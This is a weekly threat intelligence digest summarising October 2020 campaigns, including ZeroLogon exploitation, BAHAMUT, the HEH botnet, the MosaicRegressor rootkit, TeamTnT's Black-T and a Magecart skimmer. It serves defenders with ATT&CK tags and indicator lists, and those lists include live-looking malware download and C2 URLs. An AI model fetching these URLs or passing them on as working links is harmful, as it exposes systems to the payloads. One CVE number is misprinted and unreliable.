Weekly Threat Intelligence Digest

October 9, 2020

This week, we digest a ZeroLogon vulnerability campaign, the BAHAMUT threat group, the HEH Botnet, Magecart attacks, and more.


Ransomware Gang Now Using Critical Windows Flaw in Attacks

October 9, 2020

Threat group TA505 is exploiting the ZeroLogon vulnerability (CVE-2020-1472) in an updated version of Mimikatz with the purpose of giving hackers increased privileges on target systems and to run malicious scripts. TA505 have been active since 2014, attacking victims across a wide range of industries and distributing a variety of malware, including banking malware, backdoors, and ransomware.

CVEs of Interest: CVE-2020-172

MITRE ATT&CK: ATT&CK 05 Defense Evasion - Trusted Developer Utilities Proxy Execution - MSBuild, ATT&CK 10 Command and Control, ATT&CK 12 Impact - Data Encrypted for Impact

Source: Bleeping Computer

 


BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps

October 7, 2020

Researchers at Blackberry released a white paper today covering the threat group known as BAHAMUT; a sophisticated for-hire cyberespionage group known for their extremely technical capabilities in the growing culture of outsourced, third-party intelligence functions.

MITRE ATT&CK: ATT&CK 01 Initial Access - Phishing, ATT&CK 02 Execution, ATT&CK 02 Execution - Command and Scripting Interpreter - Python, ATT&CK 02 Execution - Command and Scripting Interpreter - Visual Basic, ATT&CK 03 Persistence, ATT&CK 10 Command and Control, ATT&CK 06 Credential Access - OS Credential Dumping, ATT&CK 09 Collection - Screen Capture, Zero Day Exploit, ATT&CK 10 Command and Control - Remote Access Software

Indicators:
Domain
account-googie[.]com
accountvalidate[.]com
airfitgym[.]com
ambicluster[.]com
aspnet.dyndns.info
assurecom[.]info
bulletinalerts[.]com
File
013417bd5465d6362cd43c70015c7a74a1b8979785b842b7cfa543cb85985852
05a4e1e6542d6b0ba7b6eced12c05e96a341deaf88adb28695365544940da5ed
085de1580421aefe1d581f4b6012a485e2665cee78630b6a0c311ee3bc8409b6
08e65f09e41da3bc211a77ced8af657bde00d7a2b93d77446f29b6c8c3262ccd
090bc0f5936a12771b7fdf15070ba2169a24108a095e939920498b94ce19596d
0a721dc82ec7eb9c20c44dbcac047879b8d15d54b3a186aaf8079058b10b30c9
0caaf92b928446e8705587744951568d96fa68d7bf4a9988ea9e98cf6ffb44f3
0d349d085c81fde9febc3b67d615ff35b6823d1742f6039aff4f2b8a68f06bfb
IPv4
103.220.47.104
103.220.47.16
103.234.220.152
103.234.220.153
164.160.131.174
167.114.194.56

This report includes over 250 indicators.
Click here to download the full list of indicators.

Source: Blackberry

 


HP Device Manager Vulnerabilities May Allow Full System Takeover

October 7, 2020

Three HP Device Manager vulnerabilities (CVE-2020-6925, CVE-2020-6926, and CVE-2020-6927) can be used in tandem to achieve remote command execution by a threat actor. The vulnerabilities have been patched by HP, however a working exploit could be crafted if users have not updated systems.

CVEs of Interest: CVE-2020-6925, CVE-2020-6926, CVE-2020-6927

MITRE ATT&CK: ATT&CK 02 Execution, ATT&CK 04 Privilege Escalation, ATT&CK 12 Impact - Data Encrypted for Impact

Source: Help Net Security

 


PoetRAT: Malware Targeting Public and Private Sector in Azerbaijan Evolves

October 6, 2020

The PoetRAT malware, initially identified in April 2020, has been seen targeting important organizations across Azerbaijan amidst violence in the Nagorno-Karabakh region. The actors behind the attacks, currently unidentified, have made PoetRAT harder to detect, implementing a new exfiltration protocol and obfuscation techniques to hide activities.

MITRE ATT&CK: ATT&CK 01 Initial Access - Phishing, ATT&CK 02 Execution, ATT&CK 02 Execution - Command and Scripting Interpreter - Python, ATT&CK 03 Persistence - Office Application Startup - Office Template Macros, ATT&CK 10 Command and Control, ATT&CK 11 Exfiltration

Indicators:
Domain
constant.py
slimip.accesscam.org
File
E4E99DC07FAE55F2FA8884C586F8006774FE0F16232BD4E13660A8610B1850A2
208EC23C233580DBFC53AAD5655845F7152ADA56DD6A5C780D54E84A9D227407
A703DC8819DCA1BC5774DE3B6151C355606E7FE93C760B56BC09BCB6F928BA2D
AC4E621CC5895F63A226F8EF183FE69E1AE631E12A5DBEF97DD16A6DFAFD1BFC
DC565146CD4ECFB45873E44AA1EA1BAC8CFA8FB086140154B429BA7274CDA9A2
64AEFFE15AECE5AE22E99D9FD55657788E71C1C52CEB08E3B16B8475B8655059

Source: Cisco Talos

 


HEH, A New IoT P2P Botnet Going After Weak Telnet Services

October 6, 2020

A newly discovered botnet has been observed in the wild performing DDoS attacks and cryptomining. The botnet, named HEH Botnet, in written in Go and spreads via brute-force attack of the Telnet service on ports 23 or 2323, and can execute arbitrary shell commands.

MITRE ATT&CK: ATT&CK 06 Credential Access - Brute Force

Indicators:
File
4F9B895A2785F9788FCAE8743AB04A24B62E0962B1F8A28DC1206C52327B7916
D302749A080DD73E25673560857495BA14FA382857F64D26138ACB044E2D9242
66786509C16E3285C5E9632AB9019BC7
C2C26A7B2A5412C9545A46E1B9B37B0E
C1B2A59F1F1592D9713AA9840C34CADE
BD07315639DA232E6BB4F796231DEF8A
6BE1590AC9E87DD7FE19257213A2DB32
4C345FDEA97A71AC235F2FA9DDB19F05
984FD7FFB7D9F20246E580E15FD93EC7
6C815DA9AF17BFA552BEB8E25749F313
43DE9C5FBAB4CD59B3EAB07A81EA8715
6FA68865F1A2DDD1CF22F1EBA583517C05B6F6C3
EFF1CE72EDDC9DE694901F410A873A9D1ED21339

Source: 360Netlab

 


MosaicRegressor: Lurking in the Shadows of UEFI

October 5, 2020

A UEFI rootkit, dubbed MosaicRegressor by Kaspersky, has been discovered in the wild being used by a Chinese-speaking threat group during data theft and espionage operations. MosaicRegressor is only the second-ever identified UEFI rootkit, with the first being the LoJax rootkit discovered in 2018.

CVEs of Interest: CVE-2018-0802

MITRE ATT&CK: ATT&CK 01 Initial Access - Phishing, ATT&CK 02 Execution - User Execution - Malicious File, ATT&CK 03 Persistence - BITS Jobs, ATT&CK 03 Persistence - Pre-OS Boot - Bootkit, ATT&CK 10 Command and Control

Indicators:
Domain
menjitghyukl.myfirewall.org
File
8F939E65E9FFEDD16AE86687E154ADBE607D56950D082778300039283F2F8330
F5B320F7E87CC6F9D02E28350BB87DE6
B53880397D331C6FE3493A9EF81CD76E
91A473D3711C28C3C563284DFAFE926B
DD8D3718197A10097CD72A94ED223238
0EFB785C75C3030C438698C77F6E960E
12B5FED367DB92475B071B6D622E44CD
3B3BC0A2772641D2FC2E7CBC6DDA33EC
70DEF87D180616406E010051ED773749
7908B9935479081A6E0F681CCEF2FDD9
AE66ED2276336668E793B167B6950040
B23E1FE87AE049F46180091D643C0201
CFB072D1B50425FF162F02846ED263F9
0D386EBBA1CCF1758A19FB0B25451AFE
233B300A58D5236C355AFD373DABC48B
449BE89F939F5F909734C0E74A0B9751
67CF741E627986E97293A8F38DE492A7
6E949601EBDD5D50707C0AF7D3F3C7A5
92F6C00DA977110200B5A3359F5E1462
A69205984849744C39CFB421D8E97B1F
D197648A3FB0D8FF6318DB922552E49E
AFC09DEB7B205EADAE4268F954444984
DC14EE862DDA3BCC0D2445FDCB3EE5AE
88750B4A3C5E80FD82CF0DD534903FC0
C63D3C25ABD49EE131004E6401AF856C
D273CD2B96E78DEF437D9C1E37155E00
72C514C0B96E3A31F6F1A85D8F28403C
9E182D30B070BB14A8922CFF4837B94D
61B4E0B1F14D93D7B176981964388291
3D2835C35BA789BD86620F98CBFBF08B
328AD6468F6EDB80B3ABF97AC39A0721
7B213A6CE7AB30A62E84D81D455B4DEA
E2F4914E38BB632E975CFF14C39D8DCD
08ECD8068617C86D7E3A3E810B106DCE
1732357D3A0081A87D56EE1AE8B4D205
74DB88B890054259D2F16FF22C79144D
7C3C4C4E7273C10DBBAB628F6B2336D8
89527F932188BD73572E2974F4344D46
36B51D2C0D8F48A7DC834F4B9E477238
1C5377A54CBAA1B86279F63EE226B1DF
9F13636D5861066835ED5A79819AAC28
FA0A874926453E452E3B6CED045D2206
C2695EF5F3A400219CAA2347F5B914C15D74A133EFA24D96D121ACFA7F95A67E
0FDCEA00A78E0263CAA45205D09B107BD50A9696F59A66951E8B9AFC42D54E02
64EABFC0612AC82EB80B8E955549B6A01899B712A99243D116E087828CA9E070
2C0DF314DCDC9FA161F5F31369037F747A794E26CEE6F8835CC37EEF3077F782
2E85CA515ACBFD4B03F93218764E3166AF04EB6F75DE14CE4DFD97D6EF259579
9F17B875E06D0DCA92807BDB7EAB2CC9437EE735
1648AE7C4BA4E87D9B6F02D6C99675C394F44A26
6896F9B29570A5DDF4DBA2831ECFD39476EE075A
FF52A54976BD89D31E246C23A267B8835CDE9383
ED1A2DC37066DC83947BE46B67A4F693B9D18F3E
IPv4
103.243.24.171
103.82.52.18
103.195.150.106
103.229.1.26
103.243.26.211
103.30.40.116
103.30.40.39
103.39.109.239
103.39.109.252
103.39.110.193
103.56.115.69
117.18.4.6
144.48.241.167
144.48.241.32
150.129.81.21
43.252.228.179
43.252.228.252
43.252.228.75
43.252.228.84
43.252.230.180
43.252.230.173
185.216.117.91
103.215.82.161
103.96.72.148
122.10.82.30

Source: Kaspersky

 


Black-T: New Cryptojacking Variant from TeamTnT

October 5, 2020

Unit 42 has uncovered a new cryptojacking malware variant, dubbed Black-T, being used in operations by threat group TeamTnT. The threat group are targeting exposed Docker daemon APIs, and upon successful exploitation, dropping Black-T. TeamTnT is known for targeting AWS credential files and mining for Monero cryptocurrency.

MITRE ATT&CK: ATT&CK 10 Command and Control, ATT&CK 11 Exfiltration

Indicators:
Domain
iplogger.org
moneroocean.stream
teamtnt.red
cruxpool.com
gimmecredz.sh
mimipenguin.py
mimipenguin.sh
mimipy.py
pack.py
pupyimporter.py
File
139F393594AABB20543543BD7D3192422B886F58E04A910637B41F14D0CAD375
A5DD446B2A7B8CFD6B6FD4047CC2FDDFCEA3A4865D8069DCD661E422046DE2A1
A506C6CF25DE202E6B2BF60FE0236911A6FF8AA33F12A78EDAD9165AB0851CAF
A5E6B084CDABE9A4557B5FF8B2313DB6C3BB4BA424D107474024030115EEAA0F
FAE2F1399282508A4F01579AD617D9DB939D0117E3B2FCFCC48AE4BEF59540D9
90C74C9FF4C502E155D2DC72F3F6C3F512D354D71B5C480C89B6C1B1852BCB1F
1CF803A8DD2A41C4B976106B0CEB2376F46BAFDDEAFBCEF6FF0C312FC78E09DA
9F8CB3F25A8B321B86EE52C16B03B3118F3B157B33E29899D265DA3433A02C79
6C16473060FFD9E215EE8FC82FF430384A8B99EA85000486F363E9BFF062898D
5B417032A80DDF4D9132A3D7D97027EEB08D9B94B89F5128863930C1967C84C4
E92B19F535FA57574401B6CDBF511A234A0B19335BD2AD6751839C718DC68E4D
C0069AAB1125A8AC1B9207E56371E86693B26B0DCAB1630F337BE55929B36A2A
84FABFBBD134BBEEB5481A96B023F44A671382349E5B39928BAF0E80E28FD599
06E9CB770C61279E91ADB5723F297D472A42568936199AEF9251A27568FD119F
79B478D9453CB18D2BAF4387B65DC01B6A4F66A620FA6348FA8DBB8549A04A20
3ACFE74CD2567E9CC60CB09BC4D0497B81161075510DD75EF8363F72C49E1789
73A956F40D51DA737A74C8AD4ECBFAB12350621FFC167B5C278CD33CE9E0E0F0
B9B3A97ED5C335B61F2CC9783CB8F24C9CFF741D020B850502542DBD81C2C2DF
1F09CCAE15D8D452BDE39F7ADA9660DF3CF0598137C5AC7A47027D8B9107415D
023283C035A98FCB0B4D32BC103A44DF5844C5E41C82261E0D029180CDE58835
A0D4CBBB61E3B900A990A2B06282989C70D5D7CB93052AD7EC04DCD64701D929
6CBF056FE35F1A809B8E8A2A5FC1F808BB4366E6E1CA2767FB82832D60C9ECF8
9469E2937BE4CF37E443BA263FFC1EE9AA1CF6B6A839AD60E3ECFE3E9E1BC24E
9703CD1D00BF6F55B5BECB1DD87FFCBD98B2AC791C152F7ADCB728C5512DF5E2
88226956193AFB5E5250639BD62305AFDE125A658B7E924CE5A5845D08F7DE08
54D7524C73EDBD9FE3CFA962656DB23D6A2D8E4EBC6A58B116B3B78D732ACFDF
AC54934DD9B3B55296BAF3E4D1AEC959F540BED71D02A6F624EDAB281A719BDF
00F116B831F720B62ACF3A2D0DB2A870B6AE114C4F9B3B517362A49C42C5A6F3
URL
https://teamtnt.red/black-t/setuptheblack-t
https://teamtnt.red/black-t/beta
https://teamtnt.red/black-t/setup/bd
https://teamtnt.red/only_for_stats/dup.php
https://teamtnt.red/x/pw
https://teamtnt.red/black-t/cleanupthisbox
https://teamtnt.red/black-t/setup/docker-update
https://teamtnt.red/black-t/setup/hole
https://teamtnt.red/black-t/setup/kube
https://teamtnt.red/black-t/setup/tshd
https://teamtnt.red/black-t/systemmod
https://teamtnt.red/ip_log/getip.php
https://teamtnt.red/x/getpwds.tar.gz
https://iplogger.org/blahblahblah

Source: Palto Alto, Unit 42

 


Anti-Virus Vulnerabilities: Who’s Guarding the Watch Tower?

October 5, 2020

Researchers at CyberArk Labs detail security vulnerabilities discovered in popular antivirus products. The vulnerabilities, which result from default Discretionary Access Control Lists (DACLs) for the ProgramData folder of Windows, can enable malicious actors to elevate privileges on a compromised system. Those antivirus solutions include those from Avira, Check Point, Fortinet, Kaspersky, McAfee, Microsoft Defender, Symantec, and Trend Micro, each of which has now been fixed by the vendor.

CVEs of Interest: CVE-2020-25043, CVE-2020-25044, CVE-2020-25045, CVE-2020-7250, CVE-2020-7310, CVE-2019-1954, CVE-2020-9290, CVE-2019-8452, CVE-2019-19688, CVE-2019-19689, CVE-2020-13903, CVE-2019-1161

MITRE ATT&CK: ATT&CK 02 Execution, ATT&CK 04 Privilege Escalation

Source: CyberArk

 


New Pastebin-like Service Used in Multiple Malware Campaigns

October 5, 2020

Juniper Threat Labs has observed malware campaigns using legitimate web-service paste.nrecom.net, similar to Pastebin, within the infection chain. The research team has identified AgentTesla, LimeRAT, and Redline Stealer malware using paste.nrecom.net to host configuration data and host malicious executables.

MITRE ATT&CK: ATT&CK 01 Initial Access - Phishing, ATT&CK 12 Impact - Data Encrypted for Impact

Indicators:
Domain
italake.com
lol.thezone.vip
thezone.vip
Files
9C38AB9D806417E89E3C035740421977F92A15C12F9FA776AC9665A1879E5F67
B50D4FD8B572C3A13C4997C83E0BBBC3F7A270E75B79EC09512142F5560F61AB
022D911560F38D5165EA4196AC74A141531D3E244CDC9BE895E539F7143A7BBB
3D3AB28F09D5736FCD2215FB6395E7B15E6E9F1F86931B1D3D956C70879E9D33
682FDD0B1A94EA8F92981FD6B697A5C4FF817FF6E838285655EDE39107CA9ADE
3DB65B267A1E41EBB307B706F561866DCE2752041F482ABE93F73144DF9A1D4D
C8ABCEDB3EC20F7AB5D9B98CC32F03B318EBA61F344E0537E4D4DE673422C6B1
52F124A478C562251459CACC60B7AFA952A8C02DF7342C1A951502307BA7B33F
9C0B50BA7EA383BF16B25EA12A830D5C63C5C995AB2F494DC270137ECFD31701
IPv4
198.12.66.108
URL
https://paste.nrecom.net/view/raw/3529ec57
https://paste.nrecom.net/view/raw/39468747
https://paste.nrecom.net/view/raw/c7dfc858
https://paste.nrecom.net/view/raw/bfbb1544
https://paste.nrecom.net/view/raw/d8aedaf6
https://paste.nrecom.net/view/raw/04fba6cb
https://paste.nrecom.net/view/raw/aec14685
https://paste.nrecom.net/view/raw/6306a51c
https://paste.nrecom.net/view/raw/4736837b
https://paste.nrecom.net/view/raw/3c3ececf
https://paste.nrecom.net/view/raw/7900ed08
https://paste.nrecom.net/view/raw/91aec4e7
https://paste.nrecom.net/view/raw/4f789f73
https://paste.nrecom.net/view/raw/93a7cd20
https://paste.nrecom.net/view/raw/bfefa179
http://198.12.66.108/v.exe
https://paste.nrecom.net/view/raw/bd63e76f
https://paste.nrecom.net/view/raw/bebcab0a
http://italake.com/assets/css/0022.exe
http://lol.thezone.vip/v.exe
https://paste.nrecom.net/view/raw/0d9233c8
https://paste.nrecom.net/view/raw/b44fe71a
https://paste.nrecom.net/view/raw/6550c073
https://paste.nrecom.net/view/raw/7f41da66
https://paste.nrecom.net/view/raw/658b9281
https://paste.nrecom.net/view/raw/019f27dd
https://paste.nrecom.net/view/raw/3066146f
https://paste.nrecom.net/view/raw/c230a816

This report includes over 150 indicators.
Click here to download the full list of indicators.

Source: Juniper Threat Labs

 


Mobile Network Operator Falls Into The Hands of Fullz House Criminal Group

October 5, 2020

Boom! Mobile has fallen victim to a Magecart card-skimming attack by threat group Fullz House, also known as Magecart Group 4. The attack involves the injection of a Base64 encoded URL that loads a credit card skimmer designed to look like a Google Analytics element. The Boom! Mobile website is still compromised and online shoppers are still at risk.

MITRE ATT&CK: ATT&CK 10 Command and Control, ATT&CK 11 Exfiltration

Indicators:
Domain
google-assistant.com
google-tasks.com
jquery-insert.com
boom.us
paypal-debit.com
google-standard.com
bing-analytics.com
google-money.com
google-sale.com
paypal-assist.com
connect-facebook.com
cdn-jquery.com
paypalapiobjects.com
googleapimanager.com
Email
medialand.regru@gmail.com
IPv4
8.208.79.49
47.254.170.245
URL
paypal-debit.com/cdn/ga.js

Source: Malwarebytes

 

Get Notifications

Sign up to get notifications when new Weekly Digests or Blogs are available on CyberPress.